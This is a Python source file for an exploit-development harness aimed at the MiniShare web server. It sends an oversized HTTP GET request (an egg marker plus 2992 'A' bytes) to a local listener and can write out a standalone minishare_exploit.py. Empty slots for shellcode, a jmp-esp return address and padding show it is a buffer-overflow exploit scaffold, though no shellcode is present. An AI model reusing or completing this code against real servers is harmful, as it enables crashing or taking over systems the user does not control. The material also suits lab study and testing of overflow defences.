import socket, sys, struct, subprocess, os
from threading import Thread
from functools import wraps
from time import sleep
def run_async(func):
    """
    Decorator that runs the wrapped callable in its own thread.

    Calling the decorated function starts a new Thread with the given
    positional and keyword arguments and returns immediately.

    @return: the started Thread object, so the caller can join() it

    Example:

        @run_async
        def task1():
            do_something

        @run_async
        def task2():
            do_something_too

        t1 = task1()
        t2 = task2()
        ...
        t1.join()
        t2.join()
    """
    @wraps(func)
    def launcher(*call_args, **call_kwargs):
        # The value func returns is not captured; only the Thread handle
        # is handed back to the caller.
        worker = Thread(target=func, args=call_args, kwargs=call_kwargs)
        worker.start()
        return worker

    return launcher
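class Exploit():
    """
    Builds and sends the oversized HTTP GET request used against MiniShare.

    The request line is "GET " + the joined buffer + " HTTP/1.1". With the
    defaults the buffer is the egg marker twice followed by 2992 "A"
    characters, 3000 characters in total. The destination is fixed to
    127.0.0.1:80, i.e. a listener on the same machine.

    A request line of this length is far outside ordinary HTTP traffic, so a
    request-length limit in front of the server, or a length-based detection
    rule, is the natural place to catch it.
    """
    def __init__(self):
        self.egg = 'EGGG'
        # shellcode, jmpesp, prebuff and postbuff start empty and are not
        # read by any method of this class.
        self.shellcode = ''
        self.jmpesp = ''
        self.prebuff = ''
        self.postbuff = ''
        # Built once from the egg as it is now; set_egg() does not rebuild it.
        self.buffer = [self.egg*2, "A"*2992]
        self.file_based = False
        self.filename = ''
        self.command = 'C:\\Program Files (x86)\\MiniShare\\minishare.exe'

    @run_async
    def exploit(self):
        """
        Send the test request to the local listener on 127.0.0.1:80.

        Decorated with run_async, so the call returns a Thread object and the
        network I/O happens on that thread.
        """
        # NOTE(review): presumably this delay gives the process named in
        # self.command time to start listening -- confirm against the caller.
        sleep(1)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.connect(('127.0.0.1',80))
            #Test 1
            message = "GET " + ''.join(self.buffer) + " HTTP/1.1\r\n\r\n"
            # NOTE(review): send() is given a str here, which is accepted on
            # Python 2 only; Python 3 requires bytes.
            sock.send(message)
        finally:
            # Release the socket even when connect() or send() raises.
            sock.close()

    def get_buffer(self):
        """Return the list of buffer parts."""
        return self.buffer

    def set_buffer(self,buff):
        """Replace the list of buffer parts."""
        self.buffer = buff

    def get_buffer_length(self):
        """Return the length of the buffer parts joined into one string."""
        return len(''.join(self.buffer))

    def get_egg(self):
        """Return the egg marker string."""
        return self.egg

    def set_egg(self,egg):
        """Set the egg marker; self.buffer is left as it was."""
        self.egg = egg

    def get_filename(self):
        """Return the configured filename."""
        return self.filename

    def set_filename(self,filename):
        """Set the configured filename."""
        self.filename = filename

    def is_filebased(self):
        """Return the file_based flag (False unless changed on the instance)."""
        return self.file_based

    def get_command(self):
        """Return the path of the MiniShare executable."""
        return self.command

    def save(self):
        """
        Write a standalone script, minishare_exploit.py, into the current
        working directory. The script sends the same request as exploit().

        The script text is assembled before the file is opened, so a failure
        while formatting the buffer does not leave a truncated file behind.
        """
        # Every buffer character is written as a \xNN escape, so nothing in
        # the buffer can terminate the quoted literal in the generated script.
        # Assumes each character's ordinal fits in one byte -- TODO confirm.
        escaped = ''.join('\\x%02x' % ord(c) for c in ''.join(self.buffer))
        script = ("import socket\n\n" +
                  "sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" +
                  "sock.connect(('127.0.0.1',80))\n" +
                  "message = 'GET " + escaped + " HTTP/1.1\\r\\n\\r\\n'\n" +
                  "sock.send(message)\n" +
                  "sock.close()\n")
        # The context manager closes the file even if write() raises.
        with open('minishare_exploit.py','w') as f:
            f.write(script)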